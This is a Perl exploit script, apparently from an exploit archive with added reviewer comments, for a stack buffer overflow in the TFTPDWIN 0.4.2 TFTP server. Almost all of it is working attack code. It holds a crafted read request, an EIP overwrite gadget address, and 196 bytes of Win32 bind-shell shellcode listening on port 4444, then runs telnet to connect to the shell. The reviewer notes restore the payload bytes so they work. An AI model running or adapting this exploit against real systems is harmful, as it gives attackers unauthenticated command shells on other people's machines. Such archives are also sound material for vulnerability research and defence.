# Title : TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit
# Published : 2007-01-15
# Author : Jacopo Cervini
#!/usr/bin/perl -w
use IO::Socket;
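use strict;
use warnings;

# TFTPDWIN 0.4.2 remote buffer overflow (Jacopo Cervini, 2007-01-15).
#
# Sends one TFTP read request (RRQ, opcode 0x0001) whose filename field
# overflows a stack buffer in tftpd.exe, overwrites the saved return
# address and transfers control into a Win32 bind shell that listens on
# TCP 4444.  The script then runs `telnet <host> 4444` to attach to it.
#
# NOTE(review): the archived copy of this listing had every backslash
# stripped ("x90" instead of "\x90", "nn" instead of "\n\n"), which makes
# the payload a string of ASCII letters instead of bytes.  The escapes are
# restored below so the byte values agree with the opcode comments.
#
# Authorised testing only: on success the target runs an unauthenticated
# command shell reachable by anyone who can reach port 4444.

# Both the target host and the UDP port are required.
unless (@ARGV >= 2 and $ARGV[1]) {
    print "Usage: tftpdwin-0-4-2.pl <target host> <port>\n\n";
    exit;
}

my ($target, $port) = @ARGV;

# UDP socket: nothing is sent here, the peer is only recorded.
my $victim = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerAddr => $target,
    PeerPort => $port,
) or die "Cannot connect to $target sulla porta $port";

# --- payload layout (sizes in bytes) --------------------------------------
my $nop0 = "\x90" x 15;                          # 15: NOP sled before the stub

# Stub that re-enters the payload relative to EBX:
#   8B C3          MOV  EAX, EBX
#   66 05 12 01    ADD  AX, 0x112
#   50             PUSH EAX
#   C3             RETN
# NOTE(review): this relies on EBX pointing into the request buffer when
# the stub runs; that register value is not visible from this script, so
# confirm the 0x112 displacement in a debugger before trusting it.
my $asm = "\x8b\xc3\x66\x05\x12\x01\x50\xc3";    # 8

my $nop  = "\x90" x 57;                          # 57: padding before shellcode
my $nop1 = "\x90" x 7;                           # 7: padding before EIP

# Saved return address overwrite: 0x4061fb42, a POP EBP / RET gadget inside
# tftpd.exe (image-specific; other builds need a different address).  Swap
# in "B" x 4 to verify the overwrite offset (EIP should read 0x42424242).
my $eip = "\x42\xfb\x61\x40";
#my $eip = "B" x 4;

# 196-byte Win32 bind shell: a binary translation of NGS "Writing Small
# Shellcode" (Dafydd Stuttard) with two changes from the original:
#   1) bind port 4444 instead of 6666 (0x115c is 4444 in network byte order);
#   2) 4 extra bytes so the cmd.exe window is not shown on the target.
my $shellcode =
    "\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64" .
    "\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C" .
    "\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77" .
    "\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60" .
    "\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF" .
    "\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7" .
    "\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B" .
    "\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4" .
    "\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3" .
    "\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4" .
    "\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44" .
    "\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50" .
    "\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";

# TFTP RRQ: opcode 0x0001, filename (the 287-byte overflow: 15+8+57+196+7+4,
# so the EIP overwrite starts 283 bytes into the field), NUL, mode, NUL.
my $exploit = "\x00\x01"
            . $nop0 . $asm . $nop . $shellcode . $nop1 . $eip
            . "\x00" . "netascii" . "\x00";

print {$victim} $exploit
    or die "Cannot send request to $target:$port: $!";
print " + Malicious request sent ...\n";
sleep(2);
print "Done.\n";
close($victim);

# Give the bind shell a moment to come up, then attach to it.  telnet is
# invoked in list form so the host argument is never interpreted by a shell.
print " + connect to 4444 port of $target ...\n";
sleep(3);
system('telnet', $target, '4444') == -1
    and warn "Cannot run telnet: $!\n";
exit;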